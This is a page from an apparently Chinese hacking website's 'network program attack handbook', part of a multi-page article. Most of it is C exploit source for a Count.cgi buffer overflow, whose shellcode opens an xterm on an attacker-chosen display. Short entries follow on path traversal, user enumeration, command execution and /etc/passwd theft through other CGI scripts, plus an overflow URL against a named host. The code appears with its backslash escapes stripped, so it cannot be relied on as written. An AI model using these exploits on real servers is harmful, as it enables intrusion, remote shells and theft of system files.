 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 网络程序攻击手册 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-11-7  |
|||||
|
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30" "x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56" "x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10" "x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbf" "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" "xffxffxffxffxffxffxffxffxffxffxff" "/usr/X11R6/bin/xterm0-ut0-display0"; char endpad[]= "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" "xffxffxffxffxffxffxffxffxffxffxff"; int main (int argc, char *argv[]){ char *shellcode = NULL; int cnt,ver,retcount, dispnum,dotquads[4],offset; unsigned long sp; char dispname[255]; char *host; offset = sp = cnt = ver = 0; fprintf(stderr,"t%s - Gusn",argv[0]); if (argc<3) usage(argv[0]); while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) { switch(cnt){ case 'h': host = optarg; break; case 'd': { retcount = sscanf(optarg, "%d.%d.%d.%d:%d", &dotquads[0], &dotquads[1], &dotquads[2], &dotquads[3], &dispnum); if (retcount != 5) usage(argv[0]); sprintf(dispname, "%03d.%03d.%03d.%03d:%01d", dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum); shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad)); sprintf(shellcode,"%s%s%s",shell,dispname,endpad); } break; case 'v': ver = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); break; } } sp = offset + getsp(ver); (void)doit(host,sp,shellcode); exit(0); } unsigned long getsp(int ver) { /* Get the stack pointer we should be using. YMMV. If it does not work, try using -o X, where x is between -1500 and 1500 */ unsigned long sp=0; if (ver == 15) sp = 0xbfffea50; if (ver == 20) sp = 0xbfffea50; if (ver == 22) sp = 0xbfffeab4; if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */ if (sp == 0) { fprintf(stderr,"I don't have an sp for that version try using the -o option.n"); fprintf(stderr,"Versions above 24 are patched for this bug.n"); exit(1); } else { return sp; } } int usage (char *name) { fprintf(stderr,"tUsage:%s -h host -d <display> -v <version> [-o <offset>]n",name); fprintf(stderr,"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22n",name); exit(1); } int openhost (char *host, int port) { int sock; struct hostent *he; struct sockaddr_in sa; he = gethostbyname(host); if (he == NULL) { perror("Bad hostnamen"); exit(-1); } memcpy(&sa.sin_addr, he->h_addr, he->h_length); sa.sin_port=htons(port); sa.sin_family=AF_INET; sock=socket(AF_INET,SOCK_STREAM,0); if (sock < 0) { perror ("cannot open socket"); exit(-1); } bzero(&sa.sin_zero,sizeof (sa.sin_zero)); if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) { perror("cannot connect to host"); exit(-1); } return(sock); } void doit (char *host,long sp, char *shellcode) { int cnt,sock; char qs[7000]; int bufsize = 16; char buf[bufsize]; char chain[] = "user=a"; bzero(buf); for(cnt=0;cnt<4104;cnt+=4) { qs[cnt+0] = sp & 0x000000ff; qs[cnt+1] = (sp & 0x0000ff00) >> 8; qs[cnt+2] = (sp & 0x00ff0000) >> 16; qs[cnt+3] = (sp & 0xff000000) >> 24; } strcpy(qs,chain); qs[strlen(chain)]=0x90; qs[4104]= sp&0x000000ff; qs[4105]=(sp&0x0000ff00)>>8; qs[4106]=(sp&0x00ff0000)>>16; qs[4107]=(sp&0xff000000)>>24; qs[4108]= sp&0x000000ff; qs[4109]=(sp&0x0000ff00)>>8; qs[4110]=(sp&0x00ff0000)>>16; qs[4111]=(sp&0xff000000)>>24; qs[4112]= sp&0x000000ff; qs[4113]=(sp&0x0000ff00)>>8; qs[4114]=(sp&0x00ff0000)>>16; qs[4115]=(sp&0xff000000)>>24; qs[4116]= sp&0x000000ff; qs[4117]=(sp&0x0000ff00)>>8; qs[4118]=(sp&0x00ff0000)>>16; qs[4119]=(sp&0xff000000)>>24; qs[4120]= sp&0x000000ff; qs[4121]=(sp&0x0000ff00)>>8; qs[4122]=(sp&0x00ff0000)>>16; qs[4123]=(sp&0xff000000)>>24; qs[4124]= sp&0x000000ff; qs[4125]=(sp&0x0000ff00)>>8; qs[4126]=(sp&0x00ff0000)>>16; qs[4127]=(sp&0xff000000)>>24; qs[4128]= sp&0x000000ff; qs[4129]=(sp&0x0000ff00)>>8; qs[4130]=(sp&0x00ff0000)>>16; qs[4131]=(sp&0xff000000)>>24; strcpy((char*)&qs[4132],shellcode); sock = openhost(host,80); write(sock,"GET /cgi-bin/Count.cgi?",23); write(sock,qs,strlen(qs)); write(sock," HTTP/1.0n",10); write(sock,"User-Agent: ",12); write(sock,qs,strlen(qs)); write(sock,"nn",2); sleep(1); /* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn",qs,qs); */ /* setenv("HTTP_USER_AGENT",qs,1); setenv("QUERY_STRING",qs,1); system("./Count.cgi"); */ } 用法是:count -h <攻击目标IP> -d <显示> -v <Count.cgi的版本> 例如:count -h www.foo.bar -d 127.0.0.1:0 -v 22 用Count.cgi看图片 http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif 二十三.finger.cgi lynx http://www.victim.com/cgi-bin/finger?@localhost 得到主机上登陆的用户名. 二十四.man.sh Robert Moniotfound followung. The May1998 issueof SysAdmin Magazinecontainsanarticle,"Web-EnabledManPages", which includes source code for very nice cgi script named man.sh to feed man pagesto aweb browser. The hypertextlinks toother man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can runany system commands with the user id of the web server and obtainthe output from them in a web page. 二十五.FormHandler.cgi 在表格里加上 你的邮箱里就有/etc/passwd 二十六.JFS 相信大家都看过"JFS 侵入 PCWEEK-LINUX 主机的详细过程"这篇文章,他利用photoads 这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样 先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi? AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=% 0a11111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa ssword=0&CityStPhone=0&Renewed=0" 创建新AD值绕过 $AdNum 的检查后用 lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi? file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 111111111 上一页 [1] [2] [3] [4] [5] [6] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| XSS漏洞另一个攻击趋势 “伪颗粒”变种后台秘密监视 灰鸽子变种NH远程控制用户偷 06月27日病毒播报 Data URI XSS与验证About XH 微软将超1亿收购语义搜索Pow 近期警惕:黑客利用高考查分 "木马点击器"泛滥 点击欺诈威 XP获死缓两年 Vista全面推广 卖场现200元电脑 低价二手电 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
